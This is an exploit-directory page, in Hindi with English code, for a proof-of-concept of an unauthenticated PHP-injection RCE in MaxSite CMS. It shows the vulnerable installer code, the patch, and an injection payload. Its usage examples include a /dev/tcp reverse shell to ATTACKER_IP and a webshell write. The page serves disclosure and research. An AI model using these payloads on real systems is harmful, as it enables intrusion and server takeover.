Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-70553-PoC — CVE-2026-70553 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो install एंडपॉइंट के माध्यम से database.php में स्थायी PHP इंजेक्शन के ज़रिए MaxSite CMS में बिना प्रमाणीकरण के RCE सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/woshidashabi1126/cve-2026-70553-poc
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubwoshidashabi1126/cve-2026-70553-poc

CVE-2026-70553-PoC

CVE-2026-70553 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो install एंडपॉइंट के माध्यम से database.php में स्थायी PHP इंजेक्शन के ज़रिए MaxSite CMS में बिना प्रमाणीकरण के RCE सक्षम बनाता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
1111 महीना पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2026-70553 - MaxSite CMS बिना प्रमाणीकरण वाला RCE

CVE CVSS

CVE-2026-70553 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: इंस्टॉल एंडपॉइंट के माध्यम से database.php में स्थायी PHP कोड इंजेक्शन द्वारा MaxSite CMS में बिना प्रमाणीकरण के रिमोट कोड निष्पादन।


अस्वीकरण

यह PoC केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए है। लेखक इस कोड के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है। केवल उन्हीं सिस्टमों पर परीक्षण करें जिनके स्वामी आप हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास है।


भेद्यता अवलोकन

MaxSite CMS संस्करण 105.2 से 109.5 तक में इंस्टॉल एंडपॉइंट में एक गंभीर बिना प्रमाणीकरण वाली रिमोट कोड निष्पादन भेद्यता मौजूद है। db_dbprefix पैरामीटर को बिना सैनिटाइज़ेशन के सीधे PHP कोड में जोड़ा जाता है, जिससे हमलावर application/config/database.php में मनमाने PHP स्टेटमेंट इंजेक्ट कर सकते हैं। चूँकि यह फ़ाइल हर अनुरोध पर शामिल (include) की जाती है, इंजेक्ट किया गया कोड स्थायी RCE प्राप्त करता है।


प्रभावित संस्करण

  • MaxSite CMS 105.2 - 109.5
  • इसमें ठीक किया गया: 109.6 (2026-06-08)

तकनीकी विवरण

मूल कारण

install/installer/functions.php में, newDatabase() फ़ंक्शन database.php की सामग्री बनाता है:

function newDatabase($PV)
{
    if (file_exists(MSODIR . 'application/config/database.php-distr')) {
        $file = file_get_contents(MSODIR . 'application/config/database.php-distr');
        
        // ... other replacements ...
        
        // VULNERABLE LINE: No sanitization of $PV['db_dbprefix']
        $file = str_replace('$db[\'default\'][\'dbprefix\'] = \'mso_\';', 
                            '$db[\'default\'][\'dbprefix\'] = \'' . $PV['db_dbprefix'] . '\';', 
                            $file);
        
        file_put_contents(MSODIR . 'application/config/database.php', $file);
        return false;
    }
    // ...
}

एक्सप्लॉइट तंत्र

इस तरह का पेलोड इंजेक्ट करके:

db_dbprefix=mso_'; system('id'); //

जनरेट की गई database.php इस प्रकार बनती है:

$db['default']['dbprefix'] = 'mso_'; system('id'); //';

यह स्ट्रिंग लिटरल से बाहर निकलकर मनमाना PHP कोड इंजेक्ट करता है।

पैच (109.6)

फिक्स में पुनः-इंस्टॉलेशन को रोकने के लिए एक जाँच जोड़ी गई:

if (file_exists(MSODIR . 'application/config/database.php-distr')
    and
    !file_exists(MSODIR . 'application/config/database.php'))  // NEW CHECK
{
    // ... create database.php only if it doesn't exist
}

उपयोग

स्थापना

git clone https://github.com/woshidashabi1126/CVE-2026-70553-PoC.git
cd CVE-2026-70553-PoC
pip3 install requests

मूल उपयोग

# Check if target has accessible install endpoint
python3 exploit.py http://target.com --check-only

# Exploit with default payload (creates poc_test.txt)
python3 exploit.py http://target.com

# Custom payload: reverse shell
python3 exploit.py http://target.com \
  --cmd 'system("bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/9001 0>&1\"");'

# Custom payload: write webshell
python3 exploit.py http://target.com \
  --cmd 'file_put_contents("shell.php", "<?php system(\$_GET[0]); ?>");'

विकल्प

--cmd           PHP code to inject (default: file write test)
--check-only    Only check if install endpoint is accessible
--db-host       Database hostname (default: localhost)
--db-user       Database username (default: test)
--db-pass       Database password (default: test)
--db-name       Database name (default: test)

शोषण की बाधाएँ

महत्वपूर्ण: इस भेद्यता की वास्तविक दुनिया के परिदृश्यों में गंभीर व्यावहारिक सीमाएँ हैं।

आवश्यकताएँ

  1. इंस्टॉल एंडपॉइंट सुलभ होना चाहिए (/install/ निर्देशिका हटाई नहीं गई हो)
  2. डेटाबेस टेबल अभी तक मौजूद नहीं होनी चाहिए (नई स्थापना या डेटाबेस साफ़ किया गया हो)
    • newDatabase() फ़ंक्शन केवल तभी कॉल होता है जब टेबल मौजूद न हों
    • इसे install/installer/post.php में checkTableExists() के माध्यम से जाँचा जाता है

अधिकांश साइटें भेद्य क्यों नहीं हैं

  • प्रोडक्शन साइटों ने इंस्टॉलेशन पूरा कर लिया है → टेबल मौजूद हैं → newDatabase() कभी कॉल नहीं होता
  • भले ही /install/ सुलभ हो, इंजेक्शन का कोड पथ टेबल मौजूदगी जाँच द्वारा अवरुद्ध हो जाता है
  • हमारे बड़े पैमाने पर किए गए स्कैन में पाया गया कि केवल ~24% साइटों का इंस्टॉल एंडपॉइंट सुलभ था, और मौजूदा डेटाबेस टेबलों के कारण 0% वास्तव में शोषण योग्य थीं

वास्तविक दुनिया में शोषण योग्यता

  • सैद्धांतिक: क्रिटिकल (9.8 CVSS)
  • व्यावहारिक: बहुत कम
  • यथार्थवादी लक्ष्य प्रोफ़ाइल:
    • प्रक्रिया के बीच में इंस्टॉलेशन बाधित
    • डेटाबेस मैन्युअल रूप से हटाया गया लेकिन कोड बना रहा
    • नए टेस्ट/डेव इंस्टेंस (प्रोडक्शन नहीं)

स्थानीय पुनरुत्पादन

नियंत्रित वातावरण में इस भेद्यता को सत्यापित करने के लिए:

भेद्य वातावरण सेटअप करें

# 1. Download vulnerable version
wget https://github.com/maxsite/cms/archive/refs/tags/109.5.zip
unzip 109.5.zip && cd cms-109.5

# 2. Start PHP built-in server
php -S 127.0.0.1:8000

# 3. In another terminal, run exploit
python3 exploit.py http://127.0.0.1:8000

इंजेक्शन सत्यापित करें

# Check if database.php was modified
cat application/config/database.php | grep dbprefix

# Should see injected code:
# $db['default']['dbprefix'] = 'mso_'; file_put_contents(...); //';

# Trigger execution
curl http://127.0.0.1:8000/

# Verify test file created
curl http://127.0.0.1:8000/poc_test.txt

संदर्भ

  • CVE-2026-70553 - CVE रिकॉर्ड
  • NVD प्रविष्टि
  • VulnCheck सलाह
  • MaxSite CMS GitHub
  • पैच कमिट (109.6)

समयरेखा

  • 2026-06-08: MaxSite CMS 109.6 फिक्स के साथ जारी किया गया
  • 2026-08-04: CVE-2026-70553 प्रकाशित हुआ
  • 2026-08-06: PoC जारी किया गया

श्रेय

  • खोज: Amir Aliu & Enrik Mustafa (VulnCheck)
  • PoC विकास: सुरक्षा शोधकर्ता
  • विक्रेता: MaxSite CMS टीम

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत जारी किया गया है। विवरण के लिए LICENSE देखें।


याद रखें: हमेशा जिम्मेदार प्रकटीकरण का अभ्यास करें और परीक्षण से पहले उचित प्राधिकरण प्राप्त करें।

टूल डाउनलोड करें